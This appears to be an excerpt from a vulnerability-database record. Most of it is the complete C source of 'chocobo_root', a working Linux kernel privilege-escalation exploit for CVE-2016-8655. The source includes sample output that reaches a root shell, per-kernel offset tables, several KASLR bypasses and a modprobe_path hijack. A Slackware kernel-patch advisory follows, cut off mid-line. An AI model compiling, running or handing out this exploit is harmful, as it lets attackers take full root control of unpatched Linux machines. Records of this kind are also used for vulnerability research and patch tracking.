vroom\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\nuser@ubuntu:~$ uname -a\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\nuser@ubuntu:~$ id\nuid=1000(user) gid=1000(user) groups=1000(user)\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\nuser@ubuntu:~$ ./chocobo_root\nlinux AF_PACKET race condition exploit by rebel\nkernel version: 4.4.0-51-generic #72\nproc_dostring = 0xffffffff81088090\nmodprobe_path = 0xffffffff81e48f80\nregister_sysctl_table = 0xffffffff812879a0\nset_memory_rw = 0xffffffff8106f320\nexploit starting\nmaking vsyscall page writable..\n\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\ncurrent packet version = 0\npbd->hdr.bh1.offset_to_first_pkt = 48\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\nclosing socket and verifying.......\nvsyscall page altered!\n\n\nstage 1 completed\nregistering new sysctl..\n\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\ncurrent packet version = 2\npbd->hdr.bh1.offset_to_first_pkt = 48\nrace not won\n\nretrying stage..\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\ncurrent packet version = 0\npbd->hdr.bh1.offset_to_first_pkt = 48\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\nclosing socket and verifying.......\nsysctl added!\n\nstage 2 completed\nbinary executed by kernel, launching rootshell\nroot@ubuntu:~# id\nuid=0(root) gid=0(root) groups=0(root),1000(user)\n\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\n\nShoutouts to:\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\nmcdelivery for delivering hotcakes and coffee\n\n11/2016\nby rebel\n---\nUpdated by <bcoles@gmail.com>\n- check number of CPU cores\n- KASLR bypasses\n- additional kernel targets\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\n*/\n\n#define _GNU_SOURCE\n\n#include <fcntl.h>\n#include <poll.h>\n#include <pthread.h>\n#include <sched.h>\n#include <signal.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <sys/sysinfo.h>\n#include <sys/utsname.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <linux/sched.h>\n#include <netinet/tcp.h>\n#include <netinet/if_ether.h>\n\n#define DEBUG\n\n#ifdef DEBUG\n# define dprintf printf\n#else\n# define dprintf\n#endif\n\n#define ENABLE_KASLR_BYPASS 1\n\n// Will be overwritten if ENABLE_KASLR_BYPASS\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\n\n// Will be overwritten by detect_versions()\nint kernel = -1;\n\n// New sysctl path\nconst char *SYSCTL_NAME = \"hack\";\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\n\nvolatile int barrier = 1;\nvolatile int vers_switcher_done = 0;\n\nstruct kernel_info {\n char *kernel_version;\n unsigned long proc_dostring;\n unsigned long modprobe_path;\n unsigned long register_sysctl_table;\n unsigned long set_memory_rw;\n};\n\nstruct kernel_info kernels[] = {\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\n { \"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\n //{\"4.4.0-46-generic #67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\n\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\n { \"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\n //{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\n};\n\n#define VSYSCALL 0xffffffffff600000\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\n\n#define KMALLOC_PAD 64\n\nint pad_fds[KMALLOC_PAD];\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ctl_table {\n const char *procname;\n void *data;\n int maxlen;\n unsigned short mode;\n struct ctl_table *child;\n void *proc_handler;\n void *poll;\n void *extra1;\n void *extra2;\n};\n\n#define CONF_RING_FRAMES 1\n\nstruct tpacket_req3 tp;\nint sfd;\nint mapped = 0;\n\nstruct timer_list {\n void *next;\n void *prev;\n unsigned long expires;\n void (*function)(unsigned long);\n unsigned long data;\n unsigned int flags;\n int slack;\n};\n\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\n\nvoid *setsockopt_thread(void *arg)\n{\n while (barrier) {}\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\n\n return NULL;\n}\n\nvoid *vers_switcher(void *arg)\n{\n int val,x,y;\n\n while (barrier) {}\n\n while (1) {\n val = TPACKET_V1;\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n y++;\n\n if (x != 0) break;\n\n val = TPACKET_V3;\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n if (x != 0) break;\n\n y++;\n }\n\n dprintf(\"[.] version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\n vers_switcher_done = 1;\n\n return NULL;\n}\n\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\n\n#define BUFSIZE 1408\nchar exploitbuf[BUFSIZE];\n\nvoid kmalloc(void)\n{\n while(1)\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\n}\n\nvoid pad_kmalloc(void)\n{\n int x;\n for (x = 0; x < KMALLOC_PAD; x++)\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\n{\n pthread_t setsockopt_thread_thread,a;\n int val;\n socklen_t l;\n struct timer_list *timer;\n int fd;\n struct tpacket_block_desc *pbd;\n int off;\n sigset_t set;\n\n sigemptyset(&set);\n\n sigaddset(&set, SIGSEGV);\n\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\n dprintf(\"[-] couldn't set sigmask\\n\");\n exit(1);\n }\n\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\n\n pad_kmalloc();\n\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\n if (fd == -1) {\n dprintf(\"[-] target socket error\\n\");\n exit(1);\n }\n\n pad_kmalloc();\n\n dprintf(\"[.] done, sockets allocated\\n\");\n\n val = TPACKET_V3;\n\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\n tp.tp_block_nr = 1;\n tp.tp_frame_size = getpagesize();\n tp.tp_frame_nr = CONF_RING_FRAMES;\n\n // try to set the timeout to 10 seconds\n // the default timeout might still be used though depending on when the race was won\n tp.tp_retire_blk_tov = 10000;\n\n sfd = fd;\n\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\n dprintf(\"[-] Error creating thread\\n\");\n return 1;\n }\n\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\n\n usleep(200000);\n\n dprintf(\"[.] removing barrier and spraying...\\n\");\n\n memset(exploitbuf, '\\x00', BUFSIZE);\n\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\n timer->next = 0;\n timer->prev = 0;\n\n timer->expires = 4294943360;\n timer->function = (void *)func;\n timer->data = arg;\n timer->flags = 1;\n timer->slack = -1;\n\n barrier = 0;\n\n usleep(100000);\n\n while (!vers_switcher_done) usleep(100000);\n\n l = sizeof(val);\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\n\n dprintf(\"[.] current packet version = %d\\n\",val);\n\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\n\n if (pbd == MAP_FAILED) {\n dprintf(\"[-] could not map pbd\\n\");\n exit(1);\n } else {\n off = pbd->hdr.bh1.offset_to_first_pkt;\n dprintf(\"[.] pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\n }\n\n\n if (val == TPACKET_V1 && off != 0) {\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\n } else {\n dprintf(\"[-] race not won\\n\");\n exit(2);\n }\n\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\n\n pthread_create(&a, NULL, verification_func, (void *)NULL);\n\n dprintf(\"\\n\");\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\n dprintf(\"[!] if you ctrl-c now the kernel will hang. so don't do that.\\n\");\n dprintf(\"\\n\");\n\n sleep(1);\n dprintf(\"[.] closing socket and verifying...\\n\");\n\n close(sfd);\n\n kmalloc();\n\n dprintf(\"[.] all messages sent\\n\");\n\n sleep(31337);\n exit(1);\n}\n\nint verification_result = 0;\n\nvoid catch_sigsegv(int sig)\n{\n verification_result = 0;\n pthread_exit((void *)1);\n}\n\nvoid *modify_vsyscall(void *arg)\n{\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\n unsigned long x = (unsigned long)arg;\n\n sigset_t set;\n sigemptyset(&set);\n sigaddset(&set, SIGSEGV);\n\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\n dprintf(\"[-] couldn't set sigmask\\n\");\n exit(EXIT_FAILURE);\n }\n\n signal(SIGSEGV, catch_sigsegv);\n\n *vsyscall = 0xdeadbeef+x;\n\n if (*vsyscall == 0xdeadbeef+x) {\n dprintf(\"[~] vsyscall page altered!\\n\");\n verification_result = 1;\n pthread_exit(0);\n }\n\n return NULL;\n}\n\nvoid verify_stage1(void)\n{\n pthread_t v_thread;\n\n sleep(5);\n\n int x;\n for(x = 0; x < 300; x++) {\n\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\n\n pthread_join(v_thread, NULL);\n\n if(verification_result == 1) {\n exit(0);\n }\n\n write(2,\".\",1);\n sleep(1);\n }\n\n dprintf(\"[-] could not modify vsyscall\\n\");\n exit(EXIT_FAILURE);\n}\n\nvoid verify_stage2(void)\n{\n struct stat b;\n\n sleep(5);\n\n int x;\n for(x = 0; x < 300; x++) {\n\n if (stat(SYSCTL_PATH, &b) == 0) {\n dprintf(\"[~] sysctl added!\\n\");\n exit(0);\n }\n\n write(2,\".\",1);\n sleep(1);\n }\n\n dprintf(\"[-] could not add sysctl\\n\");\n exit(EXIT_FAILURE);\n}\n\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\n{\n int status;\n int pid;\n\nretry:\n\n pid = fork();\n\n if (pid == 0) {\n try_exploit(func, arg, verification_func);\n exit(1);\n }\n\n wait(&status);\n\n dprintf(\"\\n\");\n\n if (WEXITSTATUS(status) == 2) {\n dprintf(\"[.] retrying stage...\\n\");\n kill(pid, 9);\n sleep(2);\n goto retry;\n }\n\n if (WEXITSTATUS(status) != 0) {\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\n exit(EXIT_FAILURE);\n }\n\n kill(pid, 9);\n}\n\n\nvoid wrapper(void)\n{\n struct ctl_table *c;\n\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\n\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\n\n dprintf(\"[~] done, stage 1 completed\\n\");\n\n sleep(5);\n\n dprintf(\"[.] registering new sysctl...\\n\\n\");\n\n c = (struct ctl_table *)(VSYSCALL+0x850);\n\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\n\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\n c->procname = (char *)(VSYSCALL+0xf00);\n c->mode = 0666;\n c->proc_handler = (void *)(PROC_DOSTRING);\n c->data = (void *)(MODPROBE_PATH);\n c->maxlen = 256;\n c->extra1 = (void *)(VSYSCALL+0xe00);\n c->extra2 = (void *)(VSYSCALL+0xd00);\n\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\n\n dprintf(\"[~] done, stage 2 completed\\n\");\n}\n\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\n\nvoid check_procs() {\n int min_procs = 2;\n\n int nprocs = 0;\n nprocs = get_nprocs_conf();\n\n if (nprocs < min_procs) {\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\n exit(EXIT_FAILURE);\n }\n\n dprintf(\"[.] system has %d processor cores\\n\", nprocs);\n}\n\nstruct utsname get_kernel_version() {\n struct utsname u;\n int rv = uname(&u);\n if (rv != 0) {\n dprintf(\"[-] uname())\\n\");\n exit(EXIT_FAILURE);\n }\n return u;\n}\n\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\n\nvoid detect_versions() {\n struct utsname u;\n char kernel_version[512];\n\n u = get_kernel_version();\n\n if (strstr(u.machine, \"64\") == NULL) {\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\n exit(EXIT_FAILURE);\n }\n\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\n exit(EXIT_FAILURE);\n }\n\n char *u_ver = strtok(u.version, \" \");\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\n\n int i;\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\n dprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].kernel_version);\n kernel = i;\n return;\n }\n }\n\n dprintf(\"[-] kernel version not recognized\\n\");\n exit(EXIT_FAILURE);\n}\n\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nbool mmap_syslog(char** buffer, int* size) {\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n if (*size == -1) {\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\n return false;\n }\n\n *size = (*size / getpagesize() + 1) * getpagesize();\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\n if (*size == -1) {\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\n return false;\n }\n\n return true;\n}\n\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\n const char* needle1 = \"Freeing unused\";\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n if (substr == NULL) return 0;\n\n int start = 0;\n int end = 0;\n for (end = start; substr[end] != '-'; end++);\n\n const char* needle2 = \"ffffff\";\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n if (substr == NULL) return 0;\n\n char* endptr = &substr[16];\n unsigned long r = strtoul(&substr[0], &endptr, 16);\n\n r &= 0xffffffffff000000ul;\n\n return r;\n}\n\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\n const char* needle1 = \"Freeing unused\";\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n if (substr == NULL) {\n return 0;\n }\n\n int start = 0;\n int end = 0;\n for (start = 0; substr[start] != '-'; start++);\n for (end = start; substr[end] != '\\n'; end++);\n\n const char* needle2 = \"ffffff\";\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n if (substr == NULL) {\n return 0;\n }\n\n char* endptr = &substr[16];\n unsigned long r = strtoul(&substr[0], &endptr, 16);\n\n r &= 0xfffffffffff00000ul;\n r -= 0x1000000ul;\n\n return r;\n}\n\nunsigned long get_kernel_addr_syslog() {\n unsigned long addr = 0;\n char* syslog;\n int size;\n\n dprintf(\"[.] trying syslog...\\n\");\n\n if (!mmap_syslog(&syslog, &size))\n return 0;\n\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\n addr = get_kernel_addr_trusty(syslog, size);\n else\n addr = get_kernel_addr_xenial(syslog, size);\n\n if (!addr)\n dprintf(\"[-] kernel base not found in syslog\\n\");\n\n return addr;\n}\n\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_kallsyms() {\n FILE *f;\n unsigned long addr = 0;\n char dummy;\n char sname[256];\n char* name = \"startup_64\";\n char* path = \"/proc/kallsyms\";\n\n dprintf(\"[.] trying %s...\\n\", path);\n f = fopen(path, \"r\");\n if (f == NULL) {\n dprintf(\"[-] open/read(%s)\\n\", path);\n return 0;\n }\n\n int ret = 0;\n while (ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n dprintf(\"[-] kernel base not found in %s\\n\", path);\n return 0;\n}\n\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_sysmap() {\n FILE *f;\n unsigned long addr = 0;\n char path[512] = \"/boot/System.map-\";\n char version[32];\n\n struct utsname u;\n u = get_kernel_version();\n strcat(path, u.release);\n dprintf(\"[.] trying %s...\\n\", path);\n f = fopen(path, \"r\");\n if (f == NULL) {\n dprintf(\"[-] open/read(%s)\\n\", path);\n return 0;\n }\n\n char dummy;\n char sname[256];\n char* name = \"startup_64\";\n int ret = 0;\n while (ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n dprintf(\"[-] kernel base not found in %s\\n\", path);\n return 0;\n}\n\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_mincore() {\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\n unsigned long iterations = 20000000;\n unsigned long addr = 0;\n\n dprintf(\"[.] trying mincore info leak...\\n\");\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\n dprintf(\"[-] mmap()\\n\");\n return 0;\n }\n\n int i;\n for (i = 0; i <= iterations; i++) {\n /* Touch a mishandle with this type mapping */\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\n dprintf(\"[-] mincore()\\n\");\n return 0;\n }\n\n int n;\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\n addr = *(unsigned long*)(&buf[n]);\n /* Kernel address space */\n if (addr > 0xffffffff00000000) {\n addr &= 0xffffffffff000000ul;\n if (munmap((void*)0x66000000, 0x20000000000))\n dprintf(\"[-] munmap()\\n\");\n return addr;\n }\n }\n }\n\n if (munmap((void*)0x66000000, 0x20000000000))\n dprintf(\"[-] munmap()\\n\");\n\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\n return 0;\n}\n\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr() {\n unsigned long addr = 0;\n\n addr = get_kernel_addr_kallsyms();\n if (addr) return addr;\n\n addr = get_kernel_addr_sysmap();\n if (addr) return addr;\n\n addr = get_kernel_addr_syslog();\n if (addr) return addr;\n\n addr = get_kernel_addr_mincore();\n if (addr) return addr;\n\n dprintf(\"[-] KASLR bypass failed\\n\");\n exit(EXIT_FAILURE);\n\n return 0;\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid launch_rootshell(void)\n{\n int fd;\n char buf[256];\n struct stat s;\n\n fd = open(SYSCTL_PATH, O_WRONLY);\n\n if(fd == -1) {\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\n exit(EXIT_FAILURE);\n }\n\n memset(buf, '\\x00', 256);\n\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\n\n write(fd, buf, strlen(buf)+1);\n\n socket(AF_INET, SOCK_STREAM, 132);\n\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\n lseek(fd, 0, SEEK_SET);\n write(fd, \"/sbin/modprobe\", 15);\n close(fd);\n execl(buf, buf, NULL);\n } else {\n dprintf(\"[-] could not create rootshell\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\nvoid setup_sandbox() {\n if (unshare(CLONE_NEWUSER) != 0) {\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n exit(EXIT_FAILURE);\n }\n\n if (unshare(CLONE_NEWNET) != 0) {\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\nint main(int argc, char **argv)\n{\n int status, pid;\n struct utsname u;\n char buf[512], *f;\n\n if (getuid() == 0 && geteuid() == 0) {\n chown(\"/proc/self/exe\", 0, 0);\n chmod(\"/proc/self/exe\", 06755);\n exit(0);\n }\n\n if (getuid() != 0 && geteuid() == 0) {\n setresuid(0, 0, 0);\n setresgid(0, 0, 0);\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\n exit(0);\n }\n\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\n\n dprintf(\"[.] starting\\n\");\n\n dprintf(\"[.] checking hardware\\n\");\n check_procs();\n dprintf(\"[~] done, hardware looks good\\n\");\n\n dprintf(\"[.] checking kernel version\\n\");\n detect_versions();\n dprintf(\"[~] done, version looks good\\n\");\n\n#if ENABLE_KASLR_BYPASS\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\n KERNEL_BASE = get_kernel_addr();\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\n#endif\n\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\n\n pid = fork();\n if (pid == 0) {\n dprintf(\"[.] setting up namespace sandbox\\n\");\n setup_sandbox();\n dprintf(\"[~] done, namespace sandbox set up\\n\");\n wrapper();\n exit(0);\n }\n\n waitpid(pid, &status, 0);\n\n launch_rootshell();\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "New kernel packages are available for Slackware 14.2 and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.38/*: Upgraded.\n This kernel fixes a security issue with a race condition in\n net/packet/af_packet.c that can be exploited to gain kernel code execution\n from unprivileged processes.\n Thanks to Philip Pettersson for discovering the bug and providing a patch.\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-generic-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-generic-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-headers-4.4.38_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-huge-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-huge-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-modules-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-modules-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-source-4.4.38_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 